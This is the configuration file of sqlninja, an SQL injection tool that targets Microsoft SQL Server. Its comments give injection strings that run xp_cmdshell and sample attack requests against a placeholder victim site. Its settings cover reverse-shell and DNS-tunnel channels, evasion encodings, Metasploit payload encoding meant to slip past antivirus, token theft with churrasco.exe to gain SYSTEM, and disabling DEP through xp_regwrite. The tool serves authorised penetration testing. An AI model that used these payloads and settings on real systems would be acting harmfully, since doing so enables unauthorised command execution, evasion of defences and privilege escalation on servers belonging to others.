1################################### 2# SQLNINJA CONFIGURATION FILE # 3################################### 4 5# options are case sensitive 6# see sqlninja-howto.html for more information and examples 7 8############ HTTP REQUEST ############ 9# The entire HTTP request, including the exploit string and a marker for the 10# SQL command to execute (__SQL2INJECT__) 11# Be sure to include the vulnerable parameter and the character sequence that 12# allows us to start injecting commands. In general this means, at least: 13# - an apostrophe (if the parameter is a string) 14# - a semicolon (to end the original query) 15# It must also include everything necessary to properly close the original 16# query, like an appropriate number of closing brackets. Don't forget to 17# URL-encode, where needed (e.g. a space must become '%20' or '+') 18# 19# For instance, if you need to inject something like the following: 20# aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'-- 21# then parameter should look like this: 22# aaa=1&bbb=x';__SQL2INJECT__ 23# 24# Make sure that: 25# 1. The --httprequest_start-- and-- httprequest_end-- markers are in place 26# 2. All required headers are present 27# 3. There are no spaces at the beginning of a line 28# 4. There are not comment lines 29# Consider copying the exact request that triggers the injection from a proxy 30# intercept (e.g.: BurpSuite), if unsure 31# 32# GET EXAMPLE: 33# --httprequest_start-- 34# GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah HTTP/1.0 35# Host: www.victim.com 36# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 37# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/* 38# Accept-Language: en-us,en;q=0.7,it;q=0.3 39# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 40# Content-Type: application/x-www-form-urlencoded 41# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx 42# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy 43# Connection: close 44# --httprequest_end-- 45# 46# POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!) 47# --httprequest_start-- 48# POST https://www.victim.com/page.asp HTTP/1.0 49# Host: www.victim.com 50# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 51# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/* 52# Accept-Language: en-us,en;q=0.7,it;q=0.3 53# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 54# Content-Type: application/x-www-form-urlencoded 55# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx 56# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy 57# Connection: close 58# 59# vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah 60# --httprequest_end-- 61# 62# HEADER-BASED EXAMPLE: 63# --httprequest_start-- 64# GET http://www.victim.com/page.asp HTTP/1.0 65# Host: www.victim.com 66# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 67# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/* 68# Accept-Language: en-us,en;q=0.7,it;q=0.3 69# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 70# Content-Type: application/x-www-form-urlencoded 71# Cookie: VulnCookie=xxx'%3B__SQL2INJECT__ 72# Connection: close 73# --httprequest_end-- 74# 75# Note that in the last example the semicolon was encoded, otherwise the server would not 76# parse __SQL2INJECT__ as part of VulnCookie 77 78# Local host: your IP address (for backscan and revshell modes) 79lhost = 192.168.60.1 80 81# Interface to sniff when in backscan mode 82device = eth0 83 84# Evasion techniques to be used. Possible choices are: 85# 1 - Query hex-encoding 86# 2 - Comments as separators 87# 3 - Random case 88# 4 - Random URI encoding 89# All techniques can be combined, so the following is legal: 90# evasion = 1234 91# However, keep in mind that using too many techniques at once leads to very 92# long queries, that might create problems when using GET. Default: no evasion 93# evasion = 12 94 95# Path to metasploit executable. Only needed if msfpayload and 96# msfcli are not already in the path 97msfpath = /home/user/trunk/ 98 99# Encoder to use with msfencode. If the option is not present, no encoding 100# is used. However, it's definitely recommended to use it, if you suspect that 101# an AV is present. A list of available encoders can be retrieved by simply 102# running "msfencoder -l" 103# msfencoder = x86/shikata_ga_nai 104 105# Number of times to encode the metasploit payload. Default: 5 106# msfencodecount = 4 107 108# If you can execute commands but SQL Server does not run as SYSTEM, 109# you can use churrasco.exe to steal the appropriate token and escalate 110# privileges. Enable this option to use churrasco.exe before executing 111# a command. This is especially useful with the metasploit module and VNC 112# Obviously, you first need to upload churrasco.exe using 113# the upload module! 114usechurrasco = no 115 116# Proxy host to use (default: none) 117# proxyhost = 127.0.0.1 118 119# Proxy port to use (default: 8080) 120# proxyport = 8080 121 122 123# Domain to use for dnstunnel mode 124domain = sqlninja.net 125 126# tcpdump filter (optional) 127# filter = src host x.x.x.x 128 129# Backscan timeout after web request conclusion (Default: 5 secs) 130# timeout = 5 131 132# Maximum hostname length for DNS tunnel (Max: 250 - Default: 250) 133# hostnamelength = 250 134 135# IP address to return to DNS queries (default: 10.255.255.254) 136# resolvedip = 10.255.255.254 137 138# Name of the procedure to use/create to launch commands. Default is 139# "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used 140# for each command 141# xp_name = xp_cmdshell 142 143# Time value for the WAITFOR during inference attack of fingerprint and 144# bruteforce mode. A higher value makes things slower but will yeld more 145# precise results against slow targets. 146# Min: 3 seconds. Max: 59 seconds. Default: 5 seconds 147blindtime = 5 148 149# Number of script lines to upload with a single HTTP request. A higher number 150# obviously means a faster upload. However, do not push this too high if your 151# request contains very long parameters. Maximum is 30, and 10 is a default 152# safe value providing already a good speed 153# lines_per_request = 10 154 155# If the remote server returns a custom error page instead of a standard 156# HTTP error code (e.g. 500 Server Error), it is wise to set this value to 157# some string that is present in such a page. This will help sqlninja in 158# figuring out if things seem to be wrong 159# errorstring = "an error has occurred" 160 161# By default, sqlninja appends two hyphens to the injected query in order 162# to comment out any spurious SQL code. This is good and works in 163# approximately 99% of the cases. However, you might want to change this 164# behavior in some very specific scenarios. Change this setting only if you 165# really know what you are doing, 166# Possible values: yes/no 167# appendcomment = yes 168 169# When using the Metasploit module DEP is not a problem anymore, since in 170# all recent versions of the framework the stager will take care of it by 171# itself. However, if needed you can still roll back to the old sqlninja 172# behavior and disable DEP by whitelisting the stager with a call to 173# xp_regwrite. To do so, set 'checkdep' to 'yes' 174# checkdep = no 175 176# You can override the standard marker used to detect where to inject the 177# sql attack code. You will probably never need to change this 178# sqlmarker = __SQL2INJECT__ 179